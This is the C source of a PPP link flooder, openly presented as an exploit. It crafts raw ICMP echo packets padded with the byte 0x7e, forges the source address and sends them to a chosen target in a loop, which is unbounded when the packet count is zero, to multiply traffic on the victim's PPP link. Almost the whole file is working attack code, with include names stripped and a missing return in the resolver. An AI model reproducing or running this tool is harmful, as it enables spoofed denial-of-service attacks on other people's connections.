/* * pppF.c * PPP Flooder * * Author: NeVErMinD * gngs@mega.ist.utl.pt * * Greets To: Susana(my love), DrBrain, paran0id, BeBe, FractalG, its1, * #torres_de_ervas * * * Few words: USSR Research Team found this bug, i just write the exploit * based on their information. Basically, what this does is * sending one special byte "0x7e" making the ppp link trafic * increase four times. * */ #include #include #include #include #include #include #include #include #include #include void usage( char *name ) { printf( "\nusage: %s [npackets]\n\n",name); printf("Made By NeVErMinD\n"); exit( 0 ); } // procedure taken from stream.c inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } struct hostent *resolv ( char *host) { struct hostent *hp; if( ( hp = gethostbyname( host ) ) == NULL ) { perror("gethostbyname()"); exit( -1 ); } } void attack( int sockid, struct sockaddr_in sin, struct sockaddr_in din, char *arg, int npackets, int sizeofpacket, int delay ) { char *packet; int psize,i; char *data; struct iphdr *ip; size_t iplen = sizeof( struct iphdr ); struct icmphdr *icmp; size_t icmplen = sizeof( struct icmphdr ); data = (char *)malloc(sizeofpacket); memset(data, 0x7e, sizeofpacket); packet = ( char * )malloc( iplen + icmplen + sizeofpacket ); ip = ( struct iphdr * )packet; icmp = ( struct icmphdr * )( packet + iplen ); bcopy( data ,(packet+iplen+icmplen) , sizeofpacket); ip->ihl = 5; ip->tos = 0; ip->version = 4; ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = din.sin_addr.s_addr; ip->tot_len = htons( iplen + icmplen + sizeofpacket ); ip->check = in_cksum( ( u_short * )ip, iplen ); icmp->type = ICMP_ECHO; icmp->code = 0; icmp->checksum =in_cksum( ( u_short * )icmp,(icmplen + sizeofpacket )); psize = ( iplen + icmplen + sizeofpacket ); printf("\n\nMade By NeVErMinD"); i=0; while ( (i != npackets) || (npackets == 0)) { if ((sendto( sockid, packet, psize, 0, ( struct sockaddr * )&din, sizeof( struct sockaddr ) ))< 0 ) { perror("sendto()"); exit( -1 ); } printf("Sending %i packets to %s\n\n", ++i,arg); usleep(delay); } printf( "\nCompleted\n"); free( packet ); } int main( int argc, char *argv[] ) { struct sockaddr_in sin, din; struct hostent *sourcehost, *desthost; int delay,sockid,npackets,sizeofpacket; if (argc<5) usage(argv[0]); if (argv[5]==NULL) npackets = 0; else npackets = ( atoi( argv[5] ) ); delay = (atoi ( argv[4]) ); sizeofpacket = ( atoi( argv[3]) ); sourcehost = resolv (argv[1]); bcopy( sourcehost->h_addr, &sin.sin_addr, sourcehost->h_length ); desthost = resolv (argv[2]); bcopy( desthost->h_addr, &din.sin_addr, desthost->h_length ); din.sin_family = AF_INET; if( ( sockid = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1 ) { perror("socket()"); exit( -1 ); } attack( sockid, sin, din, argv[2], npackets, sizeofpacket,delay ); return 0; }